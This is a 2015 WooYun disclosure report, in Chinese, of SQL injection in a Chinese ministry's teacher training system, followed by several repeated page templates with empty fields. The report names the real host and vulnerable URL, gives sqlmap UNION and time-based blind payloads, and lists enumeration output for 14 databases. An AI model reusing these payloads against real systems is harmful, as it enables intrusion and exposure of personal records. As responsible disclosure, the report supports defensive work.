人力资源和社会保障部所属某系统存在严重高危漏洞泄漏大量敏感信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113259

漏洞标题：人力资源和社会保障部所属某系统存在严重高危漏洞泄漏大量敏感信息

漏洞作者： Looke

提交时间：2015-05-11 10:46

修复时间：2015-06-29 16:44

公开时间：2015-06-29 16:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-11：细节已通知厂商并且等待厂商处理中
2015-05-15：厂商已经确认，细节仅向厂商公开
2015-05-25：细节向核心白帽子及相关领域专家公开
2015-06-04：细节向普通白帽子公开
2015-06-14：细节向实习白帽子公开
2015-06-29：细节向公众公开

简要描述：

女孩为男孩做了可乐鸡翅
男孩尝了一口说真好吃
女孩也吃了一口
说：骗子，根本没熟
男孩温柔的说：小傻瓜，你做什么我都感觉好吃
几天后
男孩和女孩得禽流感死了

详细说明：

漏洞出现在技工院校师资培训管理系统，我没有dump数据，不要请我喝茶啊。
漏洞URL：

116.90.83.207:8088//TrainingInforMS/toIsOrnotWriteSurveyAction.action?majorId=2&numOfPeriod=3&studentInformation.studentName=fd&studentInformation.identifyId=522401164324545234

studentInformation.studentName存在注入：

---
Parameter: studentInformation.studentName (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: majorId=2&numOfPeriod=3&studentInformation.studentName=fd' UNION ALL SELECT 43,43,CONCAT(0x71707a7a71,0x55695678464b73547671,0x71717a7a71)#&studentInformation.identifyId=522401164324545234
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: majorId=2&numOfPeriod=3&studentInformation.studentName=fd' AND (SELECT * FROM (SELECT(SLEEP(5)))VMrB) AND 'iMOX'='iMOX&studentInformation.identifyId=522401164324545234
---

漏洞证明：

总共14个数据库：

available databases [14]:                                                      
[*] dataacquisition
[*] fw3d
[*] infoapply
[*] information_schema
[*] mtrainingds
[*] mysql
[*] scntrainii
[*] scntrainii_xj
[*] scntrainiizh
[*] sxscntrainii
[*] teset
[*] test
[*] traininginforms
[*] wintrain33

泄漏数据上百万啊，还是挺严重的。

Database: scntrainii_xj
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| entstu_datum                          | 31476   |
| actrecord                             | 25369   |
| soebsjc                               | 1743    |
| soecszy                               | 1605    |
| soestuscore                           | 1605    |
| entclazz_experiment                   | 1140    |
| entstuscore                           | 909     |
| thktestoption                         | 815     |
| soestuattend                          | 564     |
| thktest                               | 506     |
| choice                                | 428     |
| soebusinessresult                     | 329     |
| uzer                                  | 317     |
| usresult                              | 227     |
| soestustore                           | 200     |
| reresult                              | 198     |
| cptestoption                          | 174     |
| thkanswer                             | 174     |
| thkgateconfig                         | 171     |
| soeturn                               | 149     |
| entstustep                            | 139     |
| thkarticle                            | 110     |
| whrresource                           | 107     |
| soebs                                 | 95      |
| entdatum                              | 72      |
| entclazz_casus                        | 66      |
| testtype                              | 61      |
| entstep                               | 60      |
| policyarticle                         | 48      |
| entscorepercent                       | 42      |
| whrgate                               | 41      |
| whrexperiment                         | 32      |
| entstuprocess                         | 27      |
| thkscoredetail                        | 24      |
| soescorepercent                       | 19      |
| soetfsjxx                             | 18      |
| taste                                 | 18      |
| clazz                                 | 17      |
| entcensorship                         | 17      |
| entexperiment                         | 16      |
| thkgate                               | 11      |
| college                               | 10      |
| thkplanbook                           | 10      |
| thkplantype                           | 10      |
| entstucompany                         | 8       |
| industry                              | 8       |
| whrcommissioner                       | 8       |
| district                              | 7       |
| province                              | 7       |
| thkscoreclass                         | 6       |
| policygroup                           | 5       |
| soeindustry                           | 5       |
| entcompanytype                        | 4       |
| experiment                            | 4       |
| purview                               | 4       |
| thkexperiment                         | 4       |
| thkgroup                              | 4       |
| thkindustry                           | 4       |
| entcasus                              | 3       |
| entmodule                             | 3       |
| hrgate                                | 3       |
| gate                                  | 2       |
| purviewscore                          | 2       |
| commissioner                          | 1       |
| entadminarea                          | 1       |
| hrexperiment                          | 1       |
| thkfinalbook                          | 1       |
| thkplandemo                           | 1       |
+---------------------------------------+---------+
Database: dataacquisition
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| studentscoreinfo                      | 117889  |
| admininformation                      | 5       |
+---------------------------------------+---------+
Database: sxscntrainii
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| entstu_datum                          | 9776    |
| actrecord                             | 2252    |
| thktestoption                         | 815     |
| soebsjc                               | 610     |
| thktest                               | 506     |
| soecszy                               | 505     |
| soestuscore                           | 505     |
| choice                                | 428     |
| entclazz_experiment                   | 399     |
| entstuscore                           | 297     |
| reresult                              | 198     |
| cptestoption                          | 174     |
| thkarticle                            | 109     |
| whrresource                           | 107     |
| uzer                                  | 101     |
| entdatum                              | 72      |
| thkgateconfig                         | 63      |
| testtype                              | 61      |
| entstep                               | 60      |
| soestuattend                          | 57      |
| soestustore                           | 52      |
| policyarticle                         | 47      |
| whrgate                               | 41      |
| soebs                                 | 35      |
| whrexperiment                         | 32      |
| soeturn                               | 31      |
| entclazz_casus                        | 30      |
| thkscoredetail                        | 24      |
| entscorepercent                       | 18      |
| soebusinessresult                     | 18      |
| entexperiment                         | 16      |
| soetfsjxx                             | 16      |
| taste                                 | 16      |
| thkgate                               | 11      |
| thkplantype                           | 10      |
| industry                              | 8       |
| whrcommissioner                       | 8       |
| clazz                                 | 7       |
| entcensorship                         | 7       |
| soescorepercent                       | 7       |
| thkscoreclass                         | 6       |
| policygroup                           | 5       |
| soeindustry                           | 5       |
| college                               | 4       |
| entcompanytype                        | 4       |
| experiment                            | 4       |
| purview                               | 4       |
| thkexperiment                         | 4       |
| thkgroup                              | 4       |
| thkindustry                           | 4       |
| entcasus                              | 3       |
| entmodule                             | 3       |
| hrgate                                | 3       |
| gate                                  | 2       |
| commissioner                          | 1       |
| entadminarea                          | 1       |
| entstuprocess                         | 1       |
| hrexperiment                          | 1       |
| thkplandemo                           | 1       |
| usresult                              | 1       |
+---------------------------------------+---------+
Database: infoapply
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| applynecessary                        | 173     |
| meetingapplyinfocontent               | 48      |
| meetingapplyinformation               | 48      |
| messagefile                           | 41      |
| messageinformation                    | 40      |
| meetinginformation                    | 17      |
| `user`                                | 15      |
| datacontext                           | 14      |
| datainfor                             | 14      |
| leavemessage                          | 14      |
| news                                  | 14      |
| newscontext                           | 14      |
| designhtmlinformation                 | 12      |
| applyinformation                      | 10      |
| collegeapplyinfocontent               | 8       |
| collegeapplyinformation               | 8       |
| replymessage                          | 7       |
| newsattachments                       | 5       |
| dataattachments                       | 2       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 993     |
| help_topic                            | 506     |
| help_keyword                          | 452     |
| help_category                         | 38      |
| `user`                                | 2       |
| host                                  | 1       |
+---------------------------------------+---------+
Database: wintrain33
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| entstu_datum                          | 1125143 |
| attendance                            | 262456  |
| entstustep                            | 257821  |
| usresult                              | 136678  |
| soebsjc                               | 58643   |
| thkanswer                             | 51022   |
| soecszy                               | 48980   |
| soestuscore                           | 48970   |
| entstuscore                           | 33852   |
| entclazz_experiment                   | 20748   |
| soestustore                           | 11917   |
| uzer                                  | 9647    |
| thkstudentgroup                       | 9157    |
| entstuprocess                         | 7563    |
| entstucompany                         | 6893    |
| studentscoreinfo                      | 4705    |
| purviewscore                          | 3786    |
| whrcompany                            | 3646    |
| thkgateconfig                         | 3285    |
| soebs                                 | 1825    |
| entclazz_casus                        | 1095    |
| thktestoption                         | 811     |
| thkplanbook                           | 793     |
| entscorepercent                       | 513     |
| thktest                               | 508     |
| t_user_class                          | 461     |
| choice                                | 428     |
| clazz                                 | 365     |
| soescorepercent                       | 365     |
| attendancecanshu                      | 364     |
| whranswer                             | 311     |
| reresult                              | 198     |
| taste                                 | 189     |
| thkfinalbook                          | 179     |
| cptestoption                          | 174     |
| thkarticle                            | 112     |
| whrresource                           | 107     |
| entdatum                              | 72      |
| testtype                              | 61      |
| entstep                               | 60      |
| t_user_college                        | 53      |
| policyarticle                         | 44      |
| whrgate                               | 41      |
| entcensorship                         | 36      |
| thkscorejudge                         | 32      |
| whrexperiment                         | 32      |
| thkscoredetail                        | 24      |
| college                               | 18      |
| entexperiment                         | 16      |
| soetfsjxx                             | 16      |
| entadminarea                          | 11      |
| thkgate                               | 11      |
| thkplantype                           | 10      |
| industry                              | 8       |
| whrcommissioner                       | 8       |
| thkscoreclass                         | 6       |
| soeindustry                           | 5       |
| thkindustry                           | 5       |
| entcompanytype                        | 4       |
| experiment                            | 4       |
| purview                               | 4       |
| thkexperiment                         | 4       |
| thkgroup                              | 4       |
| entcasus                              | 3       |
| entmodule                             | 3       |
| hrgate                                | 3       |
| policygroup                           | 3       |
| gate                                  | 2       |
| thkcomment                            | 2       |
| adscore                               | 1       |
| commissioner                          | 1       |
| hrexperiment                          | 1       |
+---------------------------------------+---------+
Database: scntrainii
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| entstu_datum                          | 736388  |
| entstustep                            | 164129  |
| soebsjc                               | 119868  |
| usresult                              | 49705   |
| thkplanbook                           | 38593   |
| soecszy                               | 32255   |
| soestuscore                           | 32255   |
| entstuscore                           | 22086   |
| thkanswer                             | 20561   |
| entclazz_experiment                   | 14022   |
| soestustore                           | 6601    |
| uzer                                  | 6342    |
| entstuprocess                         | 5194    |
| entstucompany                         | 4796    |
| purviewscore                          | 4455    |
| thkfinalbook                          | 3671    |
| thkgateconfig                         | 2214    |
| soebs                                 | 1230    |
| thktestoption                         | 807     |
| entclazz_casus                        | 738     |
| thktest                               | 509     |
| choice                                | 428     |
| entscorepercent                       | 411     |
| clazz                                 | 246     |
| soescorepercent                       | 246     |
| reresult                              | 198     |
| cptestoption                          | 174     |
| thkarticle                            | 124     |
| whrresource                           | 107     |
| thkcomment                            | 106     |
| thkstudentgroup                       | 96      |
| taste                                 | 92      |
| entdatum                              | 72      |
| testtype                              | 61      |
| entstep                               | 60      |
| policyarticle                         | 49      |
| whrgate                               | 41      |
| thkscorejudge                         | 34      |
| whrexperiment                         | 32      |
| thkscoredetail                        | 24      |
| entexperiment                         | 16      |
| entadminarea                          | 14      |
| entcensorship                         | 13      |
| thkgate                               | 11      |
| soetfsjxx                             | 10      |
| thkplantype                           | 10      |
| industry                              | 8       |
| whrcommissioner                       | 8       |
| policygroup                           | 6       |
| thkindustry                           | 6       |
| thkscoreclass                         | 6       |
| soeindustry                           | 5       |
| thkplandemo                           | 5       |
| college                               | 4       |
| entcompanytype                        | 4       |
| experiment                            | 4       |
| purview                               | 4       |
| thkexperiment                         | 4       |
| thkgroup                              | 4       |
| entcasus                              | 3       |
| entmodule                             | 3       |
| hrgate                                | 3       |
| adscore                               | 2       |
| gate                                  | 2       |
| commissioner                          | 1       |
| hrexperiment                          | 1       |
+---------------------------------------+---------+
Database: fw3d
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| userdetailinformation                 | 997310  |
| useripinformation                     | 207913  |
| bu_contactinfo                        | 12      |
| productinformation                    | 10      |
| system_userinfo                       | 10      |
| system_role                           | 3       |
+---------------------------------------+---------+
Database: traininginforms
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| questionanswer                        | 48909   |
| trainingscheduledetails               | 3724    |
| studentinformation                    | 2577    |
| stutrainschedetailsmapping            | 2400    |
| archiveinformation                    | 1766    |
| documentcontent                       | 1385    |
| stuphotomapping                       | 1378    |
| messageinformation                    | 1159    |
| allocateinformation                   | 422     |
| teacherinformation                    | 204     |
| deploymentinformation                 | 164     |
| userinformation                       | 111     |
| teacherschedumapping                  | 99      |
| documentinformation                   | 64      |
| provinceinformation                   | 64      |
| questionping                          | 63      |
| messageboard                          | 33      |
| experinformation                      | 23      |
| trainingorganization                  | 21      |
| majorinformation                      | 15      |
| questionnaire                         | 9       |
| news                                  | 6       |
| useprivilege                          | 6       |
| datalist                              | 2       |
| company                               | 1       |
| deploypromapping                      | 1       |
+---------------------------------------+---------+
Database: scntrainiizh
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| thktestoption                         | 815     |
| entstu_datum                          | 520     |
| thktest                               | 507     |
| choice                                | 428     |
| reresult                              | 198     |
| cptestoption                          | 174     |
| thkarticle                            | 109     |
| whrresource                           | 107     |
| thkanswer                             | 102     |
| thkstudentgroup                       | 96      |
| entstuscore                           | 90      |
| entdatum                              | 72      |
| testtype                              | 61      |
| entstep                               | 60      |
| thkplanbook                           | 59      |
| entclazz_experiment                   | 57      |
| soebsjc                               | 55      |
| policyarticle                         | 46      |
| whrgate                               | 41      |
| thkscorejudge                         | 34      |
| whrexperiment                         | 32      |
| soecszy                               | 30      |
| soestuscore                           | 30      |
| usresult                              | 28      |
| thkscoredetail                        | 24      |
| entexperiment                         | 16      |
| soetfsjxx                             | 16      |
| taste                                 | 16      |
| thkgate                               | 11      |
| thkplantype                           | 10      |
| entstuprocess                         | 9       |
| thkgateconfig                         | 9       |
| industry                              | 8       |
| whrcommissioner                       | 8       |
| uzer                                  | 7       |
| thkscoreclass                         | 6       |
| policygroup                           | 5       |
| soebs                                 | 5       |
| soeindustry                           | 5       |
| thkfinalbook                          | 5       |
| entcompanytype                        | 4       |
| experiment                            | 4       |
| purview                               | 4       |
| thkcomment                            | 4       |
| thkexperiment                         | 4       |
| thkgroup                              | 4       |
| thkindustry                           | 4       |
| entcasus                              | 3       |
| entclazz_casus                        | 3       |
| entmodule                             | 3       |
| entscorepercent                       | 3       |
| hrgate                                | 3       |
| adscore                               | 2       |
| gate                                  | 2       |
| purviewscore                          | 2       |
| thkplandemo                           | 2       |
| clazz                                 | 1       |
| college                               | 1       |
| commissioner                          | 1       |
| entadminarea                          | 1       |
| entcensorship                         | 1       |
| entstustep                            | 1       |
| hrexperiment                          | 1       |
| soescorepercent                       | 1       |
| soestustore                           | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 6644    |
| STATISTICS                            | 1112    |
| KEY_COLUMN_USAGE                      | 859     |
| TABLE_CONSTRAINTS                     | 745     |
| PARTITIONS                            | 539     |
| TABLES                                | 539     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 276     |
| SESSION_VARIABLES                     | 276     |
| REFERENTIAL_CONSTRAINTS               | 210     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128     |
| COLLATIONS                            | 127     |
| PROCESSLIST                           | 117     |
| USER_PRIVILEGES                       | 52      |
| CHARACTER_SETS                        | 36      |
| SCHEMATA                              | 14      |
| PLUGINS                               | 10      |
| TRIGGERS                              | 10      |
| ENGINES                               | 8       |
+---------------------------------------+---------+
Database: mtrainingds
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| r_sec_role_access                     | 24      |
| t_sec_account                         | 24      |
| bird_s_homework                       | 18      |
| bird_homework                         | 17      |
| t_sec_access                          | 2       |
| bird_semester                         | 1       |
+---------------------------------------+---------+

修复方案：

过滤

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-05-15 16:42

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT向人社部通报，同时上报国家上级信息安全协调机构。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113259

漏洞标题：人力资源和社会保障部所属某系统存在严重高危漏洞泄漏大量敏感信息

相关厂商：中华人民共和国人力资源和社会保障部

漏洞作者： Looke

提交时间：2015-05-11 10:46

修复时间：2015-06-29 16:44

公开时间：2015-06-29 16:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113259

漏洞标题：人力资源和社会保障部所属某系统存在严重高危漏洞泄漏大量敏感信息

相关厂商：中华人民共和国人力资源和社会保障部

漏洞作者： Looke

提交时间：2015-05-11 10:46

修复时间：2015-06-29 16:44

公开时间：2015-06-29 16:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0113259"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：